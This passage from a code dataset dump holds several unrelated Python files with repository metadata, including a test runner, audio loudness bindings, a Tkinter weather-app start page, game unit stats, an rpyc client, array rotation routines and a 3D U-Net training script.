jinja_env, path)\n name = base\n else:\n node = FileCopyNode(relpath)\n name = f\n\n curdir.add_child(name, node)\n\n render_all(root)\n\n assets_src = osp.join(config[\"THEME\"], \"assets\")\n assets_dest = osp.join(config[\"DESTDIR\"],\n 
config[\"THEME_ASSETS_PATH\"].lstrip(osp.sep))\n\n if os.path.isdir(assets_src):\n copied = False\n while not copied:\n try:\n shutil.copytree(assets_src, assets_dest)\n copied = True\n except FileExistsError:\n if not stat.S_ISDIR(os.lstat(assets_dest).st_mode):\n os.unlink(assets_dest)\n else:\n shutil.rmtree(assets_dest)\n","repo_name":"Frogging101/rsitegen","sub_path":"rsitegen/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11442855534","text":"import unittest\nimport random\nimport time\nfrom common import S_Log\nimport HTMLTestRunner\nfrom common import readConfig\nimport os\nimport datetime\nfrom common import mail\n\nreport_path = os.path.join(os.getcwd(), \"relust\")\ntestCase_path = os.path.join(os.getcwd(), 'testCase')\ndata = readConfig.readconfig().get_Xml_testName()\nlogger=S_Log.LogClass()\n\n\nclass Alltest:\n\n def test_setSuiteCase(self):\n print(data)\n print(testCase_path)\n test_suit = unittest.TestSuite()\n suite = []\n for case in data:\n print(case)\n discover = unittest.defaultTestLoader.discover(testCase_path, pattern=case + '.py', top_level_dir=None)\n suite.append(discover)\n\n for value in suite:\n test_suit.addTest(value)\n\n return test_suit\n\n\n def run_test(self):\n suit=self.test_setSuiteCase()\n id=str(random.randint(2000,9999))\n try:\n report_abspath = os.path.join(report_path, \"result\"+str(datetime.datetime.now().year)+str(datetime.datetime.now().month)+id+\".html\")\n fp = open(report_abspath, \"wb\")\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp,\n title=u'自动化测试报告,测试结果如下:',\n description=u'用例执行情况:')\n runner.run(suit)\n time.sleep(10)\n mail.configMail().send(\"result\"+str(datetime.datetime.now().year)+str(datetime.datetime.now().month)+id)\n except Exception as ex:\n logger.log_info(ex)\n\n # @parameterized.parameterized.expand(data)\n # def testRun(self,modelName):\n # path=os.path.join(os.getcwd(),'testCase\\\\'+str(modelName)+'')\n # print(path)\n # all_cases = unittest.defaultTestLoader.discover(path, pattern='l*.py')\n # report_abspath = os.path.join(report_path, \"result.html\")\n # fp = open(report_abspath, \"wb\")\n # runner = HTMLTestRunner.HTMLTestRunner(stream=fp,\n # title=u'自动化测试报告,测试结果如下:',\n # description=u'用例执行情况:')\n # runner.run(all_cases)\nif __name__ == '__main__':\n Alltest().run_test()","repo_name":"chenmolv/SPF_API","sub_path":"runAll.py","file_name":"runAll.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7466642861","text":"from __future__ import absolute_import, unicode_literals\n\nfrom collections import namedtuple\n\nfrom groove import utils\nfrom groove._groove import ffi, lib\nfrom groove.groove import GrooveClass\n\n__all__ = [\n 'LoudnessDetector',\n 'LoudnessDetectorInfo',\n]\n\n\nLoudnessDetectorInfo = namedtuple('LoudnessDetectorInfo', [\n 'loudness',\n 'peak',\n 'duration',\n 'playlist_item',\n])\n\n\nclass LoudnessDetector(GrooveClass):\n \"\"\"pass\"\"\"\n _ffitype = 'struct GrooveLoudnessDetector *'\n\n info_queue_size = utils.property_convert('info_queue_size', int,\n doc=\"\"\"Maximum number of items to store in this LoudnessDetector's\n queue\n\n This defaults to MAX_INT, meaning that the loudness detector will cause\n the decoder to decode the entire playlist. If you want to instead, for\n example, obtain loudness info at the same time as playback, you might\n set this value to 1.\n \"\"\")\n\n sink_buffer_size = utils.property_convert('sink_buffer_size', int,\n doc=\"\"\"How big the sink buffer should be, in sample frames\n\n LoudnessDetector defaults this to 8192\n \"\"\")\n\n disable_album = utils.property_convert('disable_album', bool,\n doc=\"\"\"Set True to only compute track loudness\n\n This is faster and requires less memory than computing both.\n LoudnessDetector defaults this to False\n \"\"\")\n\n @property\n def playlist(self):\n \"\"\"Playlist to generate loudness info for\"\"\"\n return self._playlist\n\n @playlist.setter\n def playlist(self, value):\n if self._playlist:\n assert lib.groove_loudness_detector_detach(self._obj) == 0\n self._playlist = None\n\n if value is not None:\n assert lib.groove_loudness_detector_attach(self._obj, value._obj) == 0\n self._playlist = value\n\n def __init__(self):\n # TODO: error handling\n obj = lib.groove_loudness_detector_create()\n assert obj != ffi.NULL\n self._obj = ffi.gc(obj, lib.groove_loudness_detector_destroy)\n self._playlist = None\n\n def __del__(self):\n # Make sure playlist gets detached before we loose the obj\n if self.playlist is not None:\n self.playlist = None\n\n def __iter__(self):\n info_obj = ffi.new('struct GrooveLoudnessDetectorInfo *');\n pitem = True\n\n while pitem:\n status = lib.groove_loudness_detector_info_get(self._obj, info_obj, True)\n assert status >= 0\n if status != 1:\n break\n\n loudness = float(info_obj.loudness)\n peak = float(info_obj.peak)\n duration = float(info_obj.duration)\n\n if info_obj.item == ffi.NULL:\n pitem = None\n else:\n pitem = self.playlist._pitem(info_obj.item)\n\n yield LoudnessDetectorInfo(loudness, peak, duration, pitem)\n\n def info_peek(self, block=False):\n \"\"\"Check if info is ready\"\"\"\n result = lib.groove_loudness_detector_info_peek(self._obj, block)\n assert result >= 0\n return bool(result)\n\n def position(self):\n \"\"\"Get the current position of the printer head\n\n Returns:\n A tuple of (playlist_item, seconds). 
If the playlist is empty\n playlist_item will be None and seconds will be -1.0\n \"\"\"\n pitem_obj_ptr = ffi.new('struct GroovePlaylistItem **')\n seconds = ffi.new('double *')\n lib.groove_loudness_detector_position(self._obj, pitem_obj_ptr, seconds)\n if pitem_obj_ptr[0] == ffi.NULL:\n pitem = None\n else:\n pitem = self.playlist._pitem(pitem_obj_ptr[0])\n return pitem, float(seconds[0])\n","repo_name":"kalhartt/python-groove","sub_path":"src/groove/loudness.py","file_name":"loudness.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"43127265388","text":"# importing standard modules \nimport requests\nimport subprocess\nimport sys\nimport tkinter as tk\nfrom tkinter import messagebox\n\n# set color scheme and font\nfrom color_schemes import color_scheme\ngui_color=color_scheme(1) # 1=default\n\ndef check_internet():\n url='http://www.google.com/'\n timeout=5\n try:\n _ = requests.get(url, timeout=timeout)\n return True\n except requests.ConnectionError:\n return False\n\nclass StartPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.configure(bg=gui_color[0])\n screenwidth=self.winfo_screenwidth() #get the current screen width\n screenheight=self.winfo_screenheight() #current height of screen\n subprocess.call('convert /pi-wrf/WRF_System/lib/start_page_bg.jpg -resize {}x{}\\! '\n ' /pi-wrf/WRF_System/lib/start_page_bg.gif'\\\n .format(screenwidth,screenheight),\n shell=True)\n photo=tk.PhotoImage(file='/pi-wrf/WRF_System/lib/start_page_bg.gif')\n\n # configuring layout of widgets\n self.grid_columnconfigure(0,weight=4)\n self.grid_rowconfigure(0,weight=1)\n self.grid_rowconfigure(1,weight=3)\n self.grid_rowconfigure(2,weight=1)\n self.grid_rowconfigure(3,weight=3)\n self.grid_rowconfigure(4,weight=1)\n \n # background label\n bg_lbl = tk.Label(self,image=photo)\n bg_lbl.image = photo\n bg_lbl.place(x=0,y=0,relwidth=1,relheight=1)\n\n # header label\n header_lbl = tk.Label(self,\n bg=gui_color[1],\n font=('Arial Bold',40),\n text='Welcome to the Raspberry Pi-WRF Application')\n header_lbl.grid(column=0,columnspan=3,sticky='new')\n \n # run forecast button\n from Pages.page_one import PageOne #located here to prevent circular imports\n run_fcst_btn = tk.Button(self,\n text='Run Forecast',\n font=('Arial Bold',40),\n borderwidth=5,bg=gui_color[2],\n activebackground=gui_color[3],\n width=20,\n command=lambda : [controller.show_frame(PageOne),check_internet()])\n run_fcst_btn.grid(row=1,sticky='s') \n if check_internet():\n run_fcst_btn.config(command=lambda : [controller.show_frame(PageOne)])\n else:\n run_fcst_btn.config(command=lambda : [messagebox.showwarning('Warning', 'No network connection detected. '\n 'cannot run live simulation. Please exit application and check connection.')])\n # archived sim button\n arc_sim_btn = tk.Button(self,\n text='Run Archived Simulation',\n font=('Arial Bold',40),\n borderwidth=5,\n bg=gui_color[2],\n activebackground=gui_color[3],\n width=20,\n command=lambda : tk.messagebox.showwarning('Warning', \n 'Archived Simulations Are Not Yet Available'))\n arc_sim_btn.grid(row=2)\n \n # exit button\n exit_btn = tk.Button(self,\n text='Exit',\n font=('Arial Bold',40),\n borderwidth=5,bg=gui_color[2],\n activebackground=gui_color[3],\n width=20,\n command=lambda : controller.quit_app())\n exit_btn.grid(row=3,sticky='n')\n\n # version label\n version_lbl = tk.Label(self,\n text=('Pi-WRF Version 1.2.0'),\n anchor='w',\n font=('Arial Bold',5),\n fg='black',\n bg=gui_color[1])\n version_lbl.grid(row=4,sticky='sew')\n","repo_name":"ClimateChangeXplorers/pi-wrf","sub_path":"src/pi-wrf/Pages/start_page.py","file_name":"start_page.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"40059266585","text":"from gameobjects.units.gameunit import UnitType\nfrom util.constants import Constants\n\n\nclass UnitInfo:\n \"\"\"\n A class documenting all the stats of the units\n Stats are om the following order: [maxhealth, attack, speed, availableattacks, range, cost]\n \"\"\"\n # SOLDIER UNITS\n spearman = {\n \"name\": \"spearman\",\n \"type\": UnitType.SOLDIER,\n \"stats\": [2, 2, 3, 1, 1, 2],\n \"requiredunit\": \"armory\",\n \"buildable\": True,\n \"description\": \"Completely broken\"\n }\n footman = {\n \"name\": \"footman\",\n \"type\": UnitType.SOLDIER,\n \"stats\": [2, 1, 2, 1, 1, 1],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Ole reliable\"\n }\n archer = {\n \"name\": \"archer\",\n \"type\": UnitType.SOLDIER,\n \"stats\": [1, 1, 2, 1, 2, 1],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"RUSH RUSH RUSH\"\n }\n # BUILDING UNITS\n village = {\n \"name\": \"village\",\n \"type\": UnitType.BUILDING,\n \"stats\": [6, 0, 0, 0, 0, 0],\n \"requiredunit\": None,\n \"buildable\": False,\n \"description\": \"Don\\'t let this die\"\n }\n goldmine = {\n \"name\": \"gold mine\",\n \"type\": UnitType.BUILDING,\n \"stats\": [3, 0, 0, 0, 0, 7],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Produces \" + str(Constants.GOLDMINE_PRODUCTION) + \" gold a turn each\"\n }\n farm = {\n \"name\": \"farm\",\n \"type\": UnitType.BUILDING,\n \"stats\": [3, 0, 0, 0, 0, 4],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Expands unit cap by \" + str(Constants.FARM_UNIT_EXPANSION)\n }\n armory = {\n \"name\": \"armory\",\n \"type\": UnitType.BUILDING,\n \"stats\": [3, 0, 0, 0, 0, 5],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Allows production of spearmen\"\n }\n magetower = {\n \"name\": \"mage tower\",\n \"type\": UnitType.BUILDING,\n \"stats\": [4, 2, 0, 1, 2, 6],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Immobile and tanky defense building\"\n }\n\n # in no particular order\n allUnitInfo = {\n \"spearman\": spearman,\n \"footman\": footman,\n \"archer\": archer,\n \"village\": village,\n \"gold mine\": goldmine,\n \"farm\": farm,\n \"armory\": armory,\n \"mage tower\": magetower\n }","repo_name":"jerukan/Conquest","sub_path":"conquest/gameobjects/units/unit_info.py","file_name":"unit_info.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43623559683","text":"import rpyc\nfrom constCS import *\n\n\ndef main() -> None:\n conn_server_name = rpyc.connect(NAME_SERVER_HOST, NAME_SERVER_PORT)\n print(MAIN_SERVER_NAME)\n server_data = conn_server_name.root.lookup(MAIN_SERVER_NAME)\n conn = rpyc.connect(server_data[0], server_data[1])\n\n # Inputs\n first_string = input(\"Input your first string: \")\n second_string = input(\"Input your second string: \")\n operation = input(\"Choose one of the following operations -> Concat, Equal, Distance: \")\n\n # Operations\n if operation == 'Concat':\n response = conn.root.concat(first_string, second_string)\n print(f\"Concatenated strings: {response}\")\n elif operation == 'Distance':\n response = conn.root.levenshtein(first_string, second_string)\n print(f\"Levenshtein Distance: {response}\")\n elif operation == 'Equal':\n response = conn.root.equal(first_string, second_string)\n if response:\n print(\"Strings are equal\")\n else:\n print(\"Strings are not equal\")\n\n else:\n response = \"Operation does not exist\"\n\n\nif __name__ == '__main__':\n main()","repo_name":"DistributedSystems-UFG/servidor-de-nomes-alefiury","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34479808520","text":"# coding=utf-8\n\"\"\"\nauthor = jamon\n\"\"\"\n\nimport time\n\nnum = 3\ndata = [[i+j*num+1 for i in range(0, num)] for j in range(0, num)]\n\n\ndef reverse_row_col(ori_data):\n \"\"\"\n 翻转数组的行列,行做列,列做行\n :param ori_data:\n :return:\n \"\"\"\n row_len = len(data) # 原始行数\n col_len = len(data[0]) # 原始列数\n new_data = [[_ for _ in range(row_len)] for _ in range(col_len)]\n for i in range(col_len):\n for j in range(row_len):\n new_data[i][j] = data[j][i]\n\n return new_data\n\n\ndef reversed(a=[]):\n return [a[i] for i in range(len(a)-1, -1, -1)]\n\n\ndef rotate_array(angle, data):\n \"\"\"\n 核心思想:将原始数组的行做列,列做行产生一个新数组缓存起来,四次旋转的四个结果即为原始数组、缓存的行列转换的数组,\n 原始数组每行逆转,缓存的数组每行逆转\n :param angle: int, 旋转角度,取值范围为[90, 180, 270, 360]\n :param data: list, [[], [], ...]\n :return: list, [[], [], []]\n \"\"\"\n lis = list()\n lis1 = reverse_row_col(data)\n angle = angle % 360 # 数组每旋转360度回到原地\n if 90 == angle:\n for row_index, row in enumerate(lis1):\n lis.append([i for i in reversed(row)])\n elif 180 == angle:\n lis2 = [i for i in reversed(data)]\n for row_index, row in enumerate(lis2):\n lis.append([i for i in reversed(row)])\n elif 270 == angle:\n lis = [i for i in reversed(lis1)]\n else:\n lis = data\n return lis\n\n\ndef rotate_array2(angle, data):\n \"\"\"\n 四种情况:\n 1. 90度,依次去每列第i个元素(降序),如第行数为m, 列数为n,则取第n列第i个元素,第n-1列第i个元素…;\n 2. 180度,依次去每行第i个元素(降序),如第行数为m, 列数为n,则取第i行第n个元素,第i行第n-1个元素…;\n 3. 270度,依次去每列第i个元素(升序),如第行数为m, 列数为n,则取第i列第k个元素,第i+1列第k个元素…;\n 4. 360度,原数组不变\n :param angle: int, 旋转角度,取值范围为[90, 180, 270, 360]\n :param data: list, [[], [], ...]\n :return: list, [[], [], []]\n \"\"\"\n row_len = len(data) # 原始行数\n col_len = len(data[0]) # 原始列数\n temp = col_len - 1\n temp2 = row_len - 1\n angle = angle % 360 # 数组每旋转360度回到原地\n\n if 90 == angle:\n result = [[_ for _ in range(row_len)] for _ in range(col_len)]\n for i in range(0, col_len):\n for j in range(temp2, -1, -1):\n result[i][j] = data[temp2-j][i]\n elif 180 == angle:\n result = [[_ for _ in range(col_len)] for _ in range(row_len)]\n for i in range(0, row_len):\n for j in range(temp, -1, -1):\n result[i][j] = data[temp2-i][temp-j]\n elif 270 == angle:\n result = [[_ for _ in range(row_len)] for _ in range(col_len)]\n for i in range(0, col_len):\n for j in range(temp2, -1, -1):\n result[i][j] = data[j][temp-i]\n else:\n result = data\n\n return result\n\n\nif __name__ == '__main__':\n data = [[2, 3, 4, 5], [5, 6, 7, 8], [9, 10, 11, 12]]\n\n s1 = time.time()\n loop_num = 1 # 101 % 4 = 1,最终结果相当于翻转一次\n for angle in [90, 180, 270, 360]:\n s1 = time.time()\n for i in range(loop_num):\n ret = rotate_array(angle, data)\n s2 = time.time()\n # print(\"x=\", x)\n print(\"\\n{} angle rotate_array {} loop took {}s\".format(angle, loop_num, s2 - s1))\n\n s1 = time.time()\n for i in range(loop_num):\n ret2 = rotate_array2(angle, data)\n s2 = time.time()\n print(\"{} angle rotate_array2 {} loop took {}s\".format(angle, loop_num, s2 - s1))\n\n for r in ret:\n print(r)\n\n print(\"\")\n for r in ret2:\n print(r)\n\n\n\n","repo_name":"yuanchangwang/cheshi","sub_path":"L16 数据结构与算法/oldboy/algo/reverse_array.py","file_name":"reverse_array.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"15867340756","text":"#!/usr/bin/env python3\n\nimport matplotlib \nmatplotlib.use('TkAgg') \nimport numpy as np\nimport os\nimport sys\nimport nibabel as nib\nimport argparse\nfrom loadimUNet3D import loadim\nfrom showim import show3D_1, show3D_2\nimport swapdim\nimport pathfun\nimport config\n\nos.environ['KERAS_BACKEND']='tensorflow'\nsys.path.append('3DUnetCNN-master')\n\nimport tensorflow as tf\n#from keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import RMSprop\nfrom keras.callbacks import ModelCheckpoint\n\n# Standard UNet model\nfrom unet3d.model import unet_model_3d\nfrom unet3d.metrics import dice_coefficient_loss, get_label_dice_coefficient_function, dice_coefficient\n\nparser = argparse.ArgumentParser(description='Label training data')\n#parser.add_argument('values', metavar='N', nargs='+')\nparser.add_argument('-networkdir', action='store', nargs=1)\nparser.add_argument('-gpunum', action='store', nargs=1)\nparser.add_argument('-ws', action='store', nargs=3)\nparser.add_argument('-setupfile', action='store', nargs=1)\nparser.add_argument('-parfile', action='store', nargs=1)\nparser.add_argument('-networkfile0', action='store', nargs=1)\nargs = parser.parse_args()\n\n# The network path\nnetworkdir = args.networkdir[0]\n\n# The network to save\nnetworkfile = os.path.join(networkdir, config.networkbase + '.h5')\n# Name of network for making list of predicted files\ne, f, networkname, ext0 = pathfun.get(networkdir)\nif not os.path.exists(networkdir):\n os.mkdir(networkdir)\n\n# GPU number to use for training\ngpunum = args.gpunum[0]\n\n# Parameter file\ntry:\n parfile = args.parfile[0]\nexcept:\n parfile = os.path.join('tools', config.parfile)\n\n# Initial network file given?\ntry:\n networkfile0 = args.networkfile0[0]\n networkdir0, e, networkbase0, ext0 = pathfun.get(networkfile0)\n msg = 'Pre-existing weights given, remember to assign a correct PARFILE'\n existweights = True\nexcept:\n msg = 'Pre-existing weights not given'\n existweights = False\nprint(msg)\n\n# Import setup file of data sets\nsetupfile = args.setupfile[0]\ndirsetup, n, basesetup, e = pathfun.get(setupfile)\nsys.path.append(dirsetup)\nprint('Import setupfile ' + setupfile)\nsetup = __import__(basesetup)\n\n# Import parameter file\nprint('Import parameter file ' + parfile)\ndirparfile, n, baseparfile, e = pathfun.get(parfile)\nsys.path.append(dirparfile)\nimport importlib\nspec = importlib.util.spec_from_file_location(\"report\", parfile)\nmodule = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(module)\n# https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path\nif hasattr(module, '__all__'):\n all_names = module.__all__\nelse:\n all_names = [name for name in dir(module) if not name.startswith('_')]\nglobals().update({name: getattr(module, name) for name in all_names})\n\n# List of data sets to train\nlistdatatrain = setup.listdatatrain\n\n# List of subjects to train\nlistsubjtrain = setup.listsubjtrain[0]\n\n# List of masks to train\nlistmasktrain = setup.listmasktrain[0]\n\n# List of subjects to predict\nlistsubjpredict = setup.listsubjpredict[0]\n\n# Lists of data to predict\nlistdatapredict = setup.listdatapredict\n\n# Sequence names\nseqname = setup.seqname\n\n# Number of sequenes\nnseq = len(listdatatrain)\n\n# To print entire array to screen\nnp.set_printoptions(threshold=1e6)\n\n# Load list of masks\npathtrainmask = np.loadtxt(listmasktrain, dtype='str')\n\n# Load list of subjects\nsubjstr = np.loadtxt(listsubjtrain, 
dtype='str')\n\n# Number of subjects\nndata = len(pathtrainmask)\n\n# Subjects to predict on\nsubjstrpredict = np.loadtxt(listsubjpredict, dtype='str')\nndatapredict = len(subjstrpredict)\n\n# Copy the lists used into a separate folder\ncmd = 'cp ' + listmasktrain + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\n# Copy setupfile into separate folder\ncmd = 'cp ' + setupfile + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\ncmd = 'cp ' + listsubjtrain + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\ncmd = 'cp ' + listsubjpredict + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\n# Copy settings file to have the settings for later use\ncmd = 'cp ' + parfile + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\nfor pathname in listdatatrain:\n cmd = 'cp ' + pathname + ' ' + networkdir\n print(cmd)\n os.system(cmd)\nfor pathname in listdatapredict:\n cmd = 'cp ' + pathname + ' ' + networkdir\n print(cmd)\n os.system(cmd)\n\n# Load list of training data into a multidimensiontal np char array\npathtraindata = np.empty([ndata, nseq], dtype=object)\ni = 0\nfor s in listdatatrain:\n pathtraindata[:, i] = np.loadtxt(s, dtype='str')\n i = i + 1\n\n# Make list of predicted files using this network\nlistpredicted = np.empty([ndatapredict, 1], dtype='object')\nfor idx, s in enumerate(subjstrpredict):\n s2 = str(s).zfill(3)\n b = os.path.join(config.datadir, s2, config.analysis, 'PREDICTED-NETWORK-' + networkname + '.nii.gz')\n listpredicted[idx] = b\n\n# Make list of predicted files\npathpredicted = os.path.join(networkdir, config.listpredicted)\nprint('Saving list of predicted data: ' + pathpredicted)\nnp.savetxt(pathpredicted, listpredicted, fmt='%s')\n\n# Number of subjects\nprint('Number of subjects: ' + str(ndata))\n\n# Number of channels\nprint('Number of channels: ' + str(nseq))\n\n# Image dimensions\ndim4D = (nseq, dim3D[0], dim3D[1], dim3D[2])\n\n# Number of spatial dimensions\nndim = len(dim3D)\n\n# Number of total samples\nnsamp = nrand + ncent\n\n# Trainingdata\nX = np.zeros((ndata*nsamp, nseq, ws[0], ws[1], ws[2]), dtype='float32')\nY = np.zeros((ndata*nsamp, ws[0], ws[1], ws[2]), dtype='float32')\n\n######################################################################\n# Load the data and do augmentation\n######################################################################\n\ncrand = 0\nsamplec = 0\nndataload = 0\ni = 0\n#i = 58\nfor s in subjstr:\n #s = '260'\n #subj = 260\n subj = s.astype('int')\n print(\"New subject \" + s)\n\n # Array containing whether the data sets exist\n # exist = np.zeros(nseq+1, dtype=bool)\n\n # Load image data\n im4D, nii3D, h, swapax, swapdims = \\\n loadim(pathtraindata[i, :], swap=True)\n h = h[0, :]\n\n # Load training mask\n msg = \"Reading training mask \" + pathtrainmask[i]\n print(msg)\n nii = nib.load(pathtrainmask[i])\n maskload = nii.get_data().astype('float')\n dim = maskload.shape\n header = nii.header\n hmask = header.get_zooms()\n\n print(\"Shape of training mask \" + str(maskload.shape))\n print('Voxelsize of training mask: ' + str(hmask))\n\n # Swap dimensions?\n mask, h, swapax, swapdims = swapdim.swapdim(maskload, h)\n\n # Find the best window placement so the tumor is in the middle of the window\n # OR crop a random placement elsewhere to train the network on background\n maskcrop = np.empty([nsamp, ws[0], ws[1], ws[2]], dtype='float32')\n maskcrop[:] = np.nan\n im4Dcrop = np.empty([nsamp, nseq, ws[0], ws[1], ws[2]], dtype='float32')\n im4Dcrop[:] = np.nan\n\n # The valid data\n valid = np.ones(nsamp, dtype='bool')\n # The range of valid 
coordinates for a random crop placement\n validc = np.array([[ws[0]/2, dim[0]-ws[0]/2],\n [ws[1]/2, dim[1]-ws[1]/2],\n [ws[2]/2, dim[2]-ws[2]/2]],\n dtype='int').round()\n\n crand = 0\n ccent = 0\n for k in np.arange(nsamp):\n print('Applying cut to sampling ' + str(k))\n\n # k == 0 is the central placement around the mask\n if k < ncent:\n print('Central mask placement')\n placement = 'central'\n else:\n # Random placement\n print('Random mask placement')\n placement = 'random'\n\n while 1:\n if placement == 'central':\n # Find a window placement with the tumor in the middle\n c = np.where(mask > 0)\n elif placement == 'random':\n # Make random coordinates\n c = np.zeros(3, dtype='int')\n for ii in np.arange(3):\n c[ii] = np.random.random_integers(validc[ii][0], validc[ii][1])\n\n start = np.zeros(3, dtype='int')\n stop = np.zeros(3, dtype='int')\n for ii in np.arange(3):\n meanc = np.around(np.mean(c[ii]))\n start[ii] = meanc - np.round(ws[ii]/2)\n stop[ii] = start[ii] + ws[ii]\n\n maskh = mask[start[0]:stop[0], start[1]:stop[1], start[2]:stop[2]]\n imh = im4D[:, start[0]:stop[0], start[1]:stop[1], start[2]:stop[2]]\n equalcropdim = np.array_equal(maskh.shape, ws)\n validcrop = False\n if equalcropdim:\n validcrop = True\n print('Valid crop x: ' + str(start[0]) + ' to ' + str(stop[0]))\n print('Valid crop y: ' + str(start[1]) + ' to ' + str(stop[1]))\n print('Valid crop z: ' + str(start[2]) + ' to ' + str(stop[2]))\n # try:\n # # Crop training data\n # maskh = mask[start[0]:stop[0], start[1]:stop[1], start[2]:stop[2]]\n # imh = im4D[:, start[0]:stop[0], start[1]:stop[1], start[2]:stop[2]]\n # print(maskh.shape)\n # a\n # validcrop = True\n # except:\n # print('Could not crop due to outside image'.upper())\n # validcrop = False\n # break\n\n # show3D_2(imh[0, :, :, :], maskh)\n if validcrop:\n break\n\n if placement == 'central':\n ccent = ccent + 1\n elif placement == 'random':\n crand = crand + 1\n\n #if validcrop:\n maskcrop[k, :, :, :] = maskh\n im4Dcrop[k, :, :, :, :] = imh\n #else:\n # # Dont take this crop for any of the reasons above\n # valid[k] = False\n\n\n #show3D_2(imh[0, :, :, :], maskh)\n\n print('Number of central samples: ' + str(ccent))\n print('Number or random samples: ' + str(crand))\n\n # Pick out the valid data\n maskcrop = maskcrop[valid, :, :, :]\n im4Dcrop = im4Dcrop[valid, :, :, :, :]\n\n # Add to array\n X[samplec:samplec+nsamp, :, :, :, :] = im4Dcrop\n Y[samplec:samplec+nsamp, :, :, :] = maskcrop\n\n # Update global counter\n samplec = samplec + nsamp\n\n i = i + 1\n\n# Restrict to valid data\nX = X[0:samplec+1, :, :, :, :]\nY = Y[0:samplec+1, :, :, :]\n\nmsg = \"Shape of feature data: \" + str(X.shape)\nprint(msg)\nmsg = \"Shape of class data: \" + str(Y.shape)\nprint(msg)\n\n######################################################################\n# Train a deep learning network\n######################################################################\n\ntf.debugging.set_log_device_placement(True)\ncmd = '/device:GPU:' + str(gpunum)\nprint(cmd)\nwith tf.device(cmd):\n\n # From https://github.com/dhuy228/augmented-volumetric-image-generator\n from sklearn.model_selection import train_test_split\n seed = 42\n d = Y.shape\n Y = np.reshape(Y, (d[0], 1, d[1], d[2], d[3]))\n if valsplit > 0:\n X_train_c, X_validation_c, Y_train_c, Y_validation_c = train_test_split(X, Y, test_size=valsplit, random_state=seed)\n else:\n X_train_c = X.copy()\n Y_train_c = Y.copy()\n\n #Y_train_c = np.reshape(Y_train_c, (d[0], 1, d[1], d[2], d[3]))\n #Y_validation_c = 
np.reshape(Y_validation_c, (d[0], 1, d[1], d[2], d[3]))\n\n from augmented import generator\n if augment:\n image_aug = generator.customImageDataGenerator(\n rotation_range=rotation_range,\n zoom_range=zoom_range,\n width_shift_range=width_shift_range,\n height_shift_range=height_shift_range,\n shear_range=shear_range,\n horizontal_flip=horizontal_flip,\n data_format='channels_first')\n mask_aug = generator.customImageDataGenerator(\n rotation_range=rotation_range,\n zoom_range=zoom_range,\n width_shift_range=width_shift_range,\n height_shift_range=height_shift_range,\n shear_range=shear_range,\n horizontal_flip=horizontal_flip)\n else:\n image_aug = generator.customImageDataGenerator(data_format='channels_first')\n mask_aug = generator.customImageDataGenerator()\n\n X_train_datagen = image_aug.flow(X_train_c, batch_size=batch_size, seed=seed) # set equal seed number\n Y_train_datagen = mask_aug.flow(Y_train_c, batch_size=batch_size, seed=seed) # set equal seed number\n train_generator = zip(X_train_datagen, Y_train_datagen)\n print('Validation split: ' + str(valsplit))\n if valsplit > 0:\n X_validation_datagen = image_aug.flow(X_validation_c, batch_size=batch_size, seed=seed) # set equal seed number\n Y_validation_datagen = mask_aug.flow(Y_validation_c, batch_size=batch_size, seed=seed) # set equal seed number\n validation_generator = zip(X_validation_datagen, Y_validation_datagen)\n\n # # Uncomment to see augmentations\n # import matplotlib.pyplot as plt\n # it = image_aug.flow(X_train_c, batch_size=1, seed=seed)\n # itmask = image_aug.flow(Y_train_c, batch_size=1, seed=seed)\n # for i in range(100):\n # # generate batch of images\n # batch = it.next()\n # batchmask = itmask.next()\n # image = batch[0].astype('float32')\n # image = np.squeeze(image)\n # mask = batchmask[0].astype('float32')\n # mask = np.squeeze(mask)\n # show3D_2(image, mask)\n # # Define the model\n inputshape = (nseq, ws[0], ws[1], ws[2])\n model = unet_model_3d(inputshape,\n pool_size=poolsize,\n n_labels=1,\n initial_learning_rate=lr,\n deconvolution=deconvolution,\n depth=depth,\n n_base_filters=n_base_filters,\n include_label_wise_dice_coefficients=False,\n metrics=dice_coefficient,\n batch_normalization=batch_normalization,\n activation_name=activation_name)\n\n # Print summary\n model.summary()\n #config = model.get_config()\n #print(config)\n #print(config[\"initial_learning_rate\"])\n\n # Compile\n model.compile(optimizer=RMSprop(lr=lr), loss=[dice_coefficient_loss], metrics=[dice_coefficient])\n # model.compile(optimizer=RMSprop(lr=0.0001), loss=dice_loss, metrics=[dice_coeff])\n # Binary crossentropy is not working, why not?\n # model.compile(optimizer=RMSprop(lr=0.0001), loss='binary_crossentropy', metrics=[dice_coeff])\n\n # Load pre-existing model weights?\n if existweights:\n msg = \"Loading model \" + networkfile0\n print(msg)\n 